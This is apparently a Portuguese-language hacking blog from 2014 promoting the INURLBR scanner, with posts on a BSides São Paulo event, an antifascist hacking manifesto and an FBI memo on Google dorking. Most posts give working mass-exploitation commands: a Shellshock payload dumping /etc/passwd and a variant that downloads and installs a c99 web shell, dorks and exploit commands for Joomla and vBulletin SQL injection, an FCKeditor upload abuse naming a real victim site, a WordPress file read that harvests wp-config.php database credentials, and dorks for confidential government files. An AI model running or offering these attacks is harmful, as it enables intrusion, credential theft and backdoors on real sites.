  Explicação do comando:
  "--comand-all 'curl -A "() { :;}; /bin/cat /etc/passwd > ~/cgi-sys/inurlbr.txt" http://_TARGET_/cgi-sys/defaultwebpage.cgi;curl http://_TARGET_/cgi-sys/inurlbr.txt'"

No parâmetro --comand-all ele define o exploit que vai ser usado nas url que o scanner listo, que executa o comando "cat /etc/passwd" que vai jogar todas as senhas do servidor no arquivo "~/cgi-sys/inurlbr.txt" depois ele executa o curl "curl http://_TARGET_/cgi-sys/inurlbr.txt'" para fazer a leitura do arquivo inserido!


[ Variação de comando ] 
 curl -A "() { :; }; wget http://site/c99.txt;mv c99.txt c.php" http://_TARGET_/cgi-sys/defaultwebpage.cgi
 
Você pode variar o comando do exploit para se adaptar a sua vontade ou exploração.


Demo:


quarta-feira, 24 de setembro de 2014

Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP)

Co0L BSidesSP

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) é uma mini-conferência sobre segurança da informação organizada por profissionais de mercado com o apoio do Garoa Hacker Clube com o objetivo de promover a inovação, discussão e a troca de conhecimento entre os participantes e divulgar os valores positivos e inovadores da cultura hacker.

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) é uma mini-conferência sobre segurança da informação organizada por profissionais de mercado com o apoio do Garoa Hacker Clube com o objetivo de promover a inovação, discussão e a troca de conhecimento entre os participantes e divulgar os valores positivos e inovadores da cultura hacker.

A Co0L BSidesSP é um evento gratuito que faz parte das conferências “Security B-Sides” existentes em mais de 60 cidades de onze países diferentes, que são mini-conferências voltadas para a comunidade. A C0oL BSidesSP pretende oferecer atividades que promovam a segurança da informação e a cultura hacker, com diversas atividades programadas para acontecer simultaneamente, incluindo duas trilhas de palestras técnicas, debates, oficinas e um “Churrascker”.

A décima edição da conferência ocorrerá no dia 23 de Novembro de 2014 (domingo) , no final de semana anterior a conferência BlackHat Summit São Paulo, uma das mais importantes conferências de segurança brasileiras.

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) ocorrerá no domingo, dia 23 de Novembro de 2014, aproveitando o final de semana que antecede a conferência BlackHat Summit São Paulo.
Neste dia terá várias atividades em paralelo, incluindo:

  • Duas trilhas de palestras técnicas
  • Várias oficinas simultâneas
  • Diversas competições no Capture The Flag (CTF)
  • Atividades diversas para fortalecer a comunidade, como a "Hacker Job Fair" e a Brazilian Arsenal
  • Palestras Relâmpago (Lightning Talks)
  • A BSidesSP 4 Kids, com atividades para crianças e adolescentes
  • Sala de descompressão, com lojinhas
  • “Churrascker” gratuito para os presentes.

As palestras terão 40 minutos de duração com 10 minutos para perguntas e respostas e para permitir a movimentação do pessoal. As oficinas serão práticas (hands-on), com 1h30 de duração cada uma.

No brasil já aconteceu varias edições do Security BSides 

  1. May 6, 2012 - Co0L BSidesSP (Sao Paulo) 
  2. October 21, 2012 - BSidesSP (parallel with Hackers to Hackers)
  3. May 19, 2013 - BSidesSP (parallel with You Sh0t the Sheriff)
  4. October 6, 2013 - BSidesSP (parallel with Hackers to Hackers)
  5. November 24, 2013 - BSidesSP (Before BH)
  6. April 13, 2014 - BSidesSP (preceding You Sh0t the Sheriff)
  7. June 15, 2014 - BSidesSP (WorldCup Edition)
  8. November 25-26, 2014 - BSidesSP (before Black Hat)

Projeto interessantes também vinculados ao evento.

0xHacker Job Fair


A "Hacker Job Fair" é uma iniciativa da Co0L BSidesSP para aproximar a comunidade de estudantes e profissionais com o mercado de trabalho, abrindo a oportunidade para discussão sobre carreira e desenvolvimento profissional com empresas e faculdades.

0xBrazilian Arsenal


O "Brazilian Arsenal" é um espaço para divulgar os projetos de ferramentas de segurança open source desenvolvidas por brasileiros, com objetivo de apoiar estas iniciativas, fomentar o uso destas ferramentas e atrair mais voluntários para ajudá-los.


Mais detalhes sobre o evento:
https://www.garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_10
http://www.securitybsides.com/w/page/82545220/BSidesSaoPaulo_Nov2014

Twitter profile: @BSidesSP
Youtube: https://www.youtube.com/user/bsides2013/videos

sexta-feira, 19 de setembro de 2014

SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar

0xSCAN + EXPLOIT

SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar

----------------------------------------------------------------------------------------------------------

0x[+] Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection
0x[+] Exploit Author : Claudio Viviani
0x[+] Vendor Homepage : http://web-dorado.com/
0x[+] Software: http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329

Date : 2014-08-31
0x[+] Tested on : Windows 7 / Mozilla Firefox
                              Linux / Mozilla Firefox

------------------------------------------------------------------------------------------------

0xDORK[0]: inurl:option=com_spidercalendar
0xDORK[1]: intext:com_spidercalendar & intext:"index of"
0xDORK[2]: inurl:php & inurl:com_spidercalendar

0xVÍDEO[0]


0xVÍDEO[1]



0xCOMANDO INURLBR EXEMPLO={

./inurlbr.php --dork 'inurl:index.php?option=com_spidercalendar' -s joomla.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'0x27" --command-vul "python exploit/Joomla/joomla-calendar.py -H http://_TARGET_/"


}


0xSCRIPT INURLBR =  {

https://github.com/googleinurl/SCANNER-INURLBR

}

0xEXPLOIT Joomla Plugin Calendar = {

http://1337day.com/exploit/22603

}

segunda-feira, 15 de setembro de 2014

VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP


VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP

INURLBR Utilizando frameworks de comandos externos


Este tutorial mostra a utilização do SCANNER inurlbr.php
em conjunto com frameworks-scripts de comandos externos ...
usando a flag [--comand-vul] e uma dork para encontrar sql relacionado
vuls ou coleta de informações utilizando framework nmap ...

Este tutorial irá focar em mostrar como o nmap e SqlMap
pode ser usado em conjunto com o SCANNER  inurlbr.php ...
Para mais informações sobre inurlbr sintaxe e como usar o SCANNER
[PHP inurlbr.php --help]

ASSISTA:



Scanner-INURLBR repository: https://github.com/googleinurl/SCANNER-INURLBR

Exploit HTMLEditor e dorks upload de arquivos

Explorando HTMLEditor 

Explorando HTMLEditor


DORK[0]=> inurl:/HTMLEditor/editor/
DORK[1]=> inurl:/HTMLEditor/editor//filemanager/
DORK[2]=> inurl:/HTMLEditor/editor//filemanager//connectors/
DORK[3]=> inurl:HTMLEditor & "Index of"
DORK[4]=> inurl:"connectors/uploadtest.html" & "Index of"
DORK[5]=> inurl:"/editor/filemanager/" ext:html
DORK[6]=> inurl:"/filemanager/" "Resource Type"


http://www.target.com/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://www.target.com/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Mude o conectar para PHP ele vai efetuar o upload.

Mude o conectar para PHP ele vai efetuar o upload.

Suporte de arquivos: TXT e JPG em algums sites você pode fazer upload HTML e PHP demais.

O arquivo upado pode ser encontrado em:


http://www.target.com/PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
 or
http://www.target.com/patch//PowerCMS%20folder/files/SEU_ARQUIVO.ALVO

Ex:
http://thymeoncavill.com.au/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
UPLOAD=>
http://thymeoncavill.com.au/CMS/files/10487462_686112868144329_1233575004575245355_n.jpg


Exemplo de uso SCANNER INURLBR

COMANDO=>{

./inurlbr.php --dork 'inurl:"/filemanager/" "Resource Type"' -q 1,6 -s fkeditor.txt -t 2 --replace='/filemanager/[INURL]/filemanager/connectors/uploadtest.html?' -a 'FCKeditor - Uploaders Tests'

}

Resultado:


Exemplo de uso SCANNER INURLBR


sábado, 13 de setembro de 2014

0xHacking Antifascista

Hack (do verbo Inglês "to hack", que significa "cortar")1 é um termo que refere-se à reconfiguração ou reprogramação de um sistema de função de forma que não autorizada pelo proprietário, administrador ou designer. O termo tem vários significados relacionados com a tecnologia e ciência de computação: pode se referir a uma correção ou melhoria rápida e inteligente de um problema de programa de computado.  Hack ou hacking antes de tudo é uma ideologia de união na internet, Cogido livre, Acesso a informação e combate direto contra governo e seus meios de censura web.


Hack (do verbo Inglês "to hack", que significa "cortar")1 é um termo que refere-se à reconfiguração ou reprogramação de um sistema de função de forma que não autorizada pelo proprietário, administrador ou designer. O termo tem vários significados relacionados com a tecnologia e ciência de computação: pode se referir a uma correção ou melhoria rápida e inteligente de um problema de programa de computado.

Hack ou hacking antes de tudo é uma ideologia de união na internet,
Código livre, Acesso a informação e combate direto contra governo e seus meios de censura web.

- Hacking vai além do deface e um By meunome.
- Hacking é subversão.
- Hacking é compartilhamento livre do conhecimento.

Foi dessa ideologia que surgiu o Cypherpunk onde seu principal objetivo é usar criptografia como arma.

Com o grande poder que hoje é contido na internet governos, grupos fascistas, pedófilos, religiosos extremistas entre outros círculos de "cidadãos de bem" tem alastrado-se igual um worms, propagando ameças, comentários racistas & machistas entre os outros de extremismos conservador.

Uma pesquisa rápida no Facebook/Google podemos encontrar desde paginas que propagam racismo a pages propagam ideias de estupros que caracterizam a mulher como ser inferior.

Então fica uma dica pra quem está querendo conhecer o mundo hacking ou que já está nele.
- Hacking é subversão e não cooperação com sistema.
- Hacking é ação direta contra grupos de repressão,censura ou que propagam ódio, E não o site da padaria pra por no seu ZONE-H.

De todos para todos:

Neither war between hackers, nor peace for the system.
Devemos combater o fascismo dentro e fora da internet.

Conheça um pouco do Antifascismo 

# Antifascismo -

Luta absoluta contra o fascismo, nazismo, golpismo, capitalismo, racismo, machismo, homofobia, transfobia, xenofobia e todos os extremismos conservadores que estão inseridos na sociedade através de discursos tendenciosos.

# Como surgiu -

A Ação Antifascista nasceu da união entre os anarquistas e os comunistas tendo um único inimigo em comum: o fascismo. Essa união se deu não através de idealizações políticas em grupos com características próprias mas, sim através da realidade cotidiana ao analisar a sociedade e perceber o risco eminente de uma extrema-direita forte, com poderes institucionais ou militares.
Como a história nos mostra, esses totalitarismos políticos/ideológicos são um risco a liberdade de expressão cultural e social, por isso é de total importância a formação de um movimento unido contra esses grupos intolerantes que almejam o poder político dentro de nossas cidades.
O nazismo e outros regimes totalitários demonstraram uma necessidade urgente de colocar dentro do nosso cotidiano uma cultura antifascista, negando, desse modo, qualquer valor que incentive o fundamentalismo/dogmatismo.
A tendência antifascista é libertária, pois, se coloca contrária aos sectarismos dos grupos que combatemos, ou seja, todos que compartilham das mesmas ideias são bem-vindos.
Todos que desejam levantar a bandeira da luta antifascista devem abandonar posturas machistas, sexistas, transfobicas, homofóbicas, misógenas, xenofobicas, extremismos religiosos/ideológicos, nacionalismos e tudo aquilo que não tenha coerência com o histórico de luta da Ação Antifascista em todos os seus anos de combate a opressão tanto da sociedade como do sistema.

# Métodos -

Ação Direta.

A ação direta sempre foi uma das principais características da luta antifascista, surgindo como uma resposta agressiva a intolerância da extrema-direita. Conhecendo a realidade das ruas, sabemos que existem grupos que perseguem e utilizam da violência para coagir todos aqueles que são contrários ao seu modelo de sociedade perfeita. White Powers (nazistas), carecas (nacionalistas), integralistas entre outros, espalham discursos de ódio utilizando o medo para atingir seus objetivos. Por este motivo, a autodefesa é algo de extrema importância para nossa integridade física meio a uma ameaça de agressão, afinal, com esses militantes não existe o diálogo.
Por compreender a importância de uma linha de frente forte contra esses grupos nas ruas, muitos Antifas organizam grupos autônomos em suas regiões e combatem o fascismo de forma mais exaltada e prática. O objetivo é fazer os radicais da extrema-direita retrocederem em suas perseguições a pessoas desprotegidas e limpar regiões de grupos extremistas que possam vir a agredir outras pessoas. Esses grupos Antifas atuam de forma descentralizada e sem lideranças; respondem às necessidades dos respectivos lugares que residem; carregam características próprias ideologicamente e culturalmente falando, porém com um objetivo em comum: lutar contra o fascismo.

Conhecimento.

Estudar é importante principalmente para você não se tornar aquilo que combate, para saber criticar aquilo que se critica e o por que de criticar. Talvez esse seja o principal método de se combater o fascismo e seus adjetivos. Conhecer, entender e refletir é o caminho mais seguro para uma consciência tranquila.
Não tenha preguiça! Leia...

Intervenção.

A intervenção é outra ação importante dentro do antifascismo, através dela fortalecemos a oposição ao fascismo.
A arte sempre foi ligada ao movimento antifascista pois com ela podemos passar mensagens muito mais profundas, ela fortalece a reflexão,
utilizamos a subversão no lugar da doutrinação.
Posters colados nas ruas, stencils, grafites, tudo aquilo que for divulgar o movimento é de extrema importância. Quanto mais mostrarmos que estamos nas ruas, mais intimidaremos os grupos que combatemos e instigaremos a curiosidade das pessoas a respeito do assunto.

Mobilização popular.

Organizar movimentos e atos contra políticas e grupos conservadores que tentem se levantar como alternativa é de extrema necessidade, lembrando que um antifascista nunca impõe seu ideal e sim o defende! Todos devem estar dispostos a se unir nas ruas contra qualquer ameaça fascista que venha surgir.

# Organização -

A ação antifascista nunca foi um movimento de unidade e institucionalizado, ela mantém-se descentralizada e totalmente autônoma.
Existem diversos grupos e coletivos antifascistas que atuam em combate ao fascismo. Não existem lideranças nem hierarquias.
Cada célula tem seus critérios e métodos de ação, e tem total liberdade para militar da forma que acharem mais conveniente, sempre visando a coerência da bandeira Antifa.

# Objetivos - 

Jamais deixar movimentos totalitários crescerem em nossas cidades, combater grupos que utilizam da violência para espalhar intolerância, fortalecer seu local Antifa e ser solidário aos camaradas de luta.

Qualquer duvida nos mande mensagem via inbox.

Antifa Unida!
Nunca dividida!

https://www.facebook.com/AntifascistaBrasil/photos/pb.414425795343798.-2207520000.1410638585./609259885860387/?type=3&theater

https://pt.wikipedia.org/wiki/Cypherpunk

quinta-feira, 4 de setembro de 2014

FALHA! Injeção de SQL em vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2 (Exploit + Vídeo)

vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.



vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.

Segundo vBulletin que confirma o problema afeta as versões 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2. O grupo romeno Romanian Security Team (RST) postou um vídeo que mostra a vulnerabilidade e confirma o relatório para vBulletin, que irá fornecer todos os detalhes após o lançamento do patch.

A vulnerabilidade permite que um atacante realize ataques de injeção SQL no banco de dados, com todas as implicações que isso pode trazer. Ou seja, extrair todas as informações e conteúdo do banco de dados, e até mesmo de lá comprometer todo o sistema.

Tal façanha foi publicado e nos permite obter a versão, nome de usuário e banco de dados para obter detalhes mais suculentos deve modificar o exploit:

Vídeo demostrativo=>




Usando exploit=> http://pastebin.com/hb2adMn6
php exploit.php {target}
Ex: php exploit.php http://forum.teste.com.br

DORK[0]=> "Powered by vBulletin® Version 5.1.2"
DORK[1]=> "Powered by vBulletin® Version 5.0.4"
DORK[2]=> "Powered by vBulletin® Version 5.0.5"
DORK[3]=> "Powered by vBulletin® Version 5.1.0"
DORK[4]=> "Powered by vBulletin® Version 5.1.1"
DORK[5]=> site:com intext:"5.0.4" & "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org


Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o ferramenta INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner, mas nada impede de usar com o scan script feito pela (RST).

Comando INURLBR=>
./inurlbr.php --dork 'site:com intext:"5.0.4" "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org -site:forumrunner.com' -s vBulletin.txt -q 6 -t 1 --comand-all 'php exploitvBulltin.php http://_TARGET_'

Demostrativo=>
Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o scanner INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner.


Fontes=>{

[+] http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html
[+] http://unaaldia.hispasec.com/2014/07/inyeccion-sql-en-el-gestor-de-foros.html
[+] http://packetstormsecurity.com/files/127537/vBulletin-5.1.2-SQL-Injection.html
[+] http://1337day.com/exploits/22452

}

segunda-feira, 1 de setembro de 2014

Projeto VLOG - Chmod777

Um dos primeiros canais brasileiro que vai abordar tema tecnologia e segurança da informação. Criado pelo nosso amigo @unknownantisec.  Com grande prazer aparecemos nesse projeto, Danilo Vaz/unknownantisec fala sobre nossa ferramenta SCANNER INURLBR que utiliza motores de busca para achar possíveis vulneráveis web.

Um dos primeiros canais brasileiro que vai abordar tema tecnologia e segurança da informação.
Criado pelo nosso amigo @unknownantisec.

Com grande prazer aparecemos nesse projeto em sua estreia, Danilo Vaz/unknownantisec fala sobre nossa ferramenta SCANNER INURLBR que utiliza motores de busca para achar possíveis vulneráveis web.

0x02 - Scanner de DORK e Post sobre MiniDOM



Blog=> http://unknownsec.wordpress.com
Canal Youtube Chmod777 => https://www.youtube.com/channel/UCIFnNrMA0SvXeUWY3xXag2A
SCRIPT INURLBR=> https://github.com/googleinurl/SCANNER-INURLBR

quarta-feira, 27 de agosto de 2014

WordPress Plugin KenBurner Slider LFD

[0x01] Dando continuidade aos pequenos bugs e grande dores de cabeças do WordPress novamente uma falha de LFD em um plugin usado por muitos sites todavia o afetado dessa vez é o KenBurner Slide a falha é bem semelhante ao do revslider na realidade é a mesma apenas mudando o alvo. Bom vamos la



[0x01] Dando continuidade aos pequenos bugs e grande dores de cabeças do WordPress novamente uma falha de LFD em um plugin usado por muitos sites todavia o afetado dessa vez é o KenBurner Slide a falha é bem semelhante ao do revslider na realidade é a mesma apenas mudando o alvo.
Bom vamos la



[0x02] Explorando com o Scanner inurlbr
Dork Index of /wp-content/plugins/kbslider

Comando

"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "

Resultado e novamente lhe retornara o wp-config.php contendo as infos do mysql do alvo
"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "



SCRIPT SCANNER INURLBR=> https://github.com/googleinurl/SCANNER-INURLBR
DD

FBI alerta sobre pesquisas avançadas no Google

FBI alerta sobre pesquisas avançadas no Google

Google Hacking sinalizado como potencial risco


Um boletim emitido pelo Departamento de Segurança Interna, o FBI e o Centro Nacional de Contraterrorismo no início deste mês avisa policiais e agentes de segurança privada que os cibernéticos maliciosos podem usar "técnicas avançadas de busca" para descobrir informações confidenciais e outras vulnerabilidades em websites. O boletim, intitulado "Malicious Cyber Actors Use Advanced Search Techniques ", descreve um conjunto de técnicas colectivamente referidos como "Google dorking" ou "Google hacking" que usam "operadores avançados" para refinar buscas para fornecer resultados mais específicos. Listas de estes operadores são fornecidos pelo Google.

RECURSO EM DESTAQUE 

Apresentado por Riverbed Technology 

10 Problemas comuns APM ajuda você a resolver
Conselhos práticos para que você possa tirar o máximo proveito dos benefícios da APM e manter seu ambiente de TI.
O memorando é bastante simples, mas o conteúdo sai como algo que faz pensar por que é necessário tal advertência em primeiro lugar. Isto é, até você começar a procurar os documentos no espaço de domínio do governo. Então, tudo faz sentido.
Ele passa a referenciar de várias flags que podem ser usados ​​no Google para encontrar informações, incluindo o tipo de arquivo, local, URL, e em operadores de texto. Google faz uma lista completa de operadores válidos que é disponível online.

OPERADORES ONLINE=>
https://sites.google.com/site/gwebsearcheducation/advanced-operators

É um exemplo, a nota destaca um incidente em 2011, onde os atacantes utilizado Google Hacking para descobrir números de segurança social em um servidor FTP Yale University. Outro incidente apontados no memorando centrou-se nas 35 mil sites que foram comprometidos após atacantes usaram o Google para localizar instalações vBulletin vulneráveis.

Uma rápida pesquisa no Google mostra que a nota não faz um ponto válido, como muitos dos sites indexados no espaço do governo oferecem uma variedade de documentos disponíveis para consumo público.

No entanto, do ponto de vista de um atacante, os formulários e documentos internos -, bem como os detalhes de contato sobre alguns deles - oferecem uma maneira de falsa legitimidade durante um ataque direcionado. Muitos dos documentos têm um contexto interno, algo que pode ser aproveitada pelos atacantes, a fim de arranjar algo para abrir um anexo, além disso, os próprios documentos contêm metadados.

Acessando esses documentos em uma ferramenta como o FOCA (Fingerprinting Organizations with Collected Archives), revela detalhes adicionais, tais como autor, endereços de email, convenções de nomeação de rede (incluindo os compartilhamentos de rede), caminhos do sistema (útil para o mapeamento de uma rede ou sistema), títulos de software e números de versão, endereços IP e dados do sistema operacional.

FOCA (Fingerprinting Organizations with Collected Archives)=>         https://www.elevenpaths.com/labstools/foca/index.html

A pesquisa abaixo oferece um exemplo do que o memorando está falando, mas ele terá de ser ajustado a fim de descobrir alguns dos documentos sensíveis. Além disso, as listas prontamente disponíveis de operadores para pesquisa de vulnerabilidades em sites podem ser encontrados por toda a Web, como a lista.

DORK=>
filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:gov "FOUO" | "NOFORN" | "Confidential" | "SECRETO" | "CONFIDENCIAL"

LISTA=>
http://pastebin.com/6tghmhzh

O memorando recomenda que administradores de sites usam robots.txt para evitar diretórios com informações confidenciais sejam indexados, e incentivou o uso do Google Hacking para descobrir os arquivos que já estão no domínio público. De lá, eles podem ser removidos do Google, seguindo as diretrizes do gigante das buscas.

DORK=> Confidential filetype:xls site:.gov
DORK=> Confidential filetype:xls site:.gov



DORK=> filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:.mil.br "FOUO" | "NOFORN" | "Confidential" | "SECRETO" | "CONFIDENCIAL"
DORK=> filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:.mil.br "FOUO" | "NOFORN" | "Confidential" | "SECRETO" | "CONFIDENCIAL"



Lista simples de operadores.
allintext: / intext:       Resultados se restringe a aqueles que contêm todos os termos da consulta que você especificar no texto da página

allintitle: / intitle:       Resultados se restringe a aqueles que contêm todos os termos da consulta que você especificar no título

allinurl: / inurl:       Resultados se restringe a aqueles que contêm todos os termos da consulta que você especificar na URL

filetype:suffix      Resultados limites para páginas,arquivos cujos nomes terminam em sufixo

site:                      Usando o operador site: restringe os resultados da pesquisa para o site ou domínio que você especificar

sinal negativo  ( – )   excluir Colocar um sinal de menos imediatamente antes de uma palavra indica que você não quer que as páginas que contêm esta palavra a aparecer em seus resultados

Pesquisa de frase (o uso de aspas duplas, “…” ) Ao colocar aspas em torno de um conjunto de palavras, você está dizendo Google para considerar as palavras exatas em que ordem exata, sem qualquer alteração

Documento=> Malicious Cyber Actors Use Advanced Search Techniques
Documento=> Malicious Cyber Actors Use Advanced Search Techniques

FONTE: http://www.csoonline.com/article/2597556/social-engineering/fbi-issues-warning-about-creative-google-searches.html